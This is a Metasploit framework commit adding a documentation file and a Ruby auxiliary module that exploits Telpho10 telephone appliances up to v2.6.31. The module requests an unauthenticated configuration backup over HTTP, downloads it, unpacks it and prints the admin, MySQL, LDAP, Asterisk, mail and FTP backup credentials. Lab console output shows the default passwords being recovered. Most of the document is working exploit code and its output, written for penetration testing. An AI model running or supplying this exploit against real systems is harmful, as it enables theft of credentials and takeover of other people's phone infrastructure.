Land #7484, Add Telpho10 Credentials Dump Exploit

bug/bundler_fix
Pearce Barry 2016-10-28 17:41:46 -05:00
commit 5c12d55c84
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
2 changed files with 291 additions and 0 deletions

View File

@ -0,0 +1,132 @@
## Vulnerable Application
Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
## Verification Steps
The following steps will allow you to install and dump the credentials from a Telpho10 instance:
1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
- note that the ISO will default to a German keyboard layout
1. configure the Telpho10's IP address
- edit /etc/networks/interfaces accordingly
1. Start msfconsole
1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
1. Do: ```run```
1. You should see a list of the retrieved Telpho10 credentials
## Scenarios
Example output when using this against a Telpho10 v2.6.31 VM:
```
$ ./msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.12.36-dev-16fc6c1 ]
+ -- --=[ 1596 exploits - 908 auxiliary - 273 post ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use auxiliary/admin/http/telpho10_credential_dump
msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
RHOST => 10.0.2.35
msf auxiliary(telpho10_credential_dump) > run
[*] Generating backup
[*] Downloading backup
[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
[*] Dumping credentials
[*] Login (/telpho/login.php)
[*] -------------------------
[+] Username: admin
[+] Password: telpho
[*] MySQL (/phpmyadmin)
[*] -------------------
[+] Username: root
[+] Password: telpho
[*] LDAP (/phpldapadmin)
[*] --------------------
[+] Username: cn=admin,dc=localdomain
[+] Password: telpho
[*] Asterisk MI (port 5038)
[*] -----------------------
[+] Username: telpho
[+] Password: telpho
[*] Mail configuration
[*] ------------------
[+] Mailserver:
[+] Username:
[+] Password:
[+] Mail from:
[*] Online Backup
[*] -------------
[+] ID:
[+] Password:
[*] Auxiliary module execution completed
msf auxiliary(telpho10_credential_dump) >
```
I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
```
msf auxiliary(telpho10_credential_dump) > run
[*] Generating backup
[*] Downloading backup
[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
[*] Dumping credentials
[*] Login (/telpho/login.php)
[*] -------------------------
[+] Username: admin
[+] Password: s3cr3t
[*] MySQL (/phpmyadmin)
[*] -------------------
[+] Username: root
[+] Password: telpho
[*] LDAP (/phpldapadmin)
[*] --------------------
[+] Username: cn=admin,dc=localdomain
[+] Password: ldaps3cr3t
[*] Asterisk MI (port 5038)
[*] -----------------------
[+] Username: telpho
[+] Password: asterisks3cr3t
[*] Mail configuration
[*] ------------------
[+] Mailserver:
[+] Username:
[+] Password:
[+] Mail from:
[*] Online Backup
[*] -------------
[+] ID:
[+] Password:
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,159 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rubygems/package'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Telpho10 Backup Credentials Dumper',
'Description' => %q{
This module exploits a vulnerability found in Telpho10 telephone system
appliance. This module generates a configuration backup of Telpho10,
downloads the file and dumps the credentials for admin login,
phpmyadmin, phpldapadmin, etc.
This module has been successfully tested on the appliance.
},
'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
'License' => MSF_LICENSE,
'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
'Platform' => 'linux',
'Targets' =>
[
['Telpho10 <= 2.6.31', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 2 2016'))
register_options(
[
Opt::RPORT(80)
], self.class)
end
# Used for unpacking backup files
def untar(tarfile)
destination = tarfile.split('.tar').first
FileUtils.mkdir_p(destination)
File.open(tarfile, 'rb') do |file|
Gem::Package::TarReader.new(file) do |tar|
tar.each do |entry|
dest = File.join destination, entry.full_name
if entry.file?
File.open(dest, 'wb') do |f|
f.write(entry.read)
end
File.chmod(entry.header.mode, dest)
end
end
end
end
return destination
end
# search for credentials in backup file
def dump_creds(mysql_file)
file = File.new(mysql_file, 'r')
while (line = file.gets)
if line.include? 'adminusername'
config = [line]
end
end
file.close
print_status('Login (/telpho/login.php)')
print_status('-------------------------')
print_good("Username: #{config.first[/adminusername\',\'(.*?)\'/, 1]}")
print_good("Password: #{config.first[/adminpassword\',\'(.*?)\'/, 1]}\n")
print_status('MySQL (/phpmyadmin)')
print_status('-------------------')
print_good('Username: root')
print_good("Password: #{config.first[/dbpassword\',\'(.*?)\'/, 1]}\n")
print_status('LDAP (/phpldapadmin)')
print_status('--------------------')
print_good('Username: cn=admin,dc=localdomain')
print_good("Password: #{config.first[/ldappassword\',\'(.*?)\'/, 1]}\n")
print_status('Asterisk MI (port 5038)')
print_status('-----------------------')
print_good("Username: #{config.first[/manageruser\',\'(.*?)\'/, 1]}")
print_good("Password: #{config.first[/managersecret\',\'(.*?)\'/, 1]}\n")
print_status('Mail configuration')
print_status('------------------')
print_good("Mailserver: #{config.first[/ipsmarthost\',\'(.*?)\'/, 1]}")
print_good("Username: #{config.first[/mailusername\',\'(.*?)\'/, 1]}")
print_good("Password: #{config.first[/mailpassword\',\'(.*?)\'/, 1]}")
print_good("Mail from: #{config.first[/mailfrom\',\'(.*?)\'/, 1]}\n")
print_status('Online Backup')
print_status('-------------')
print_good("ID: #{config.first[/ftpbackupid\',\'(.*?)\'/, 1]}")
print_good("Password: #{config.first[/ftpbackuppw\',\'(.*?)\'/, 1]}\n")
end
def run
res = send_request_cgi({
'uri' => '/telpho/system/backup.php',
'method' => 'GET'
})
if res && res.code == 200
print_status('Generating backup')
sleep(1)
else
print_error("Could not find vulnerable script. Aborting.")
return nil
end
print_status('Downloading backup')
res = send_request_cgi({
'uri' => '/telpho/temp/telpho10.epb',
'method' => 'GET'
})
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error('0 bytes returned, file does not exist or is empty.')
return nil
end
path = store_loot(
'telpho10.backup',
'application/x-compressed',
datastore['RHOST'],
res.body,
'backup.tar'
)
print_good("File saved in: #{path}")
begin
extracted = untar("#{path}")
mysql = untar("#{extracted}/mysql.tar")
rescue
print_error('Could not unpack files.')
return nil
end
begin
print_status("Dumping credentials\n")
dump_creds("#{mysql}/mysql.epb")
rescue
print_error('Could not find credential file.')
return nil
end
else
print_error('Failed to download backup file.')
return nil
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return nil
end
end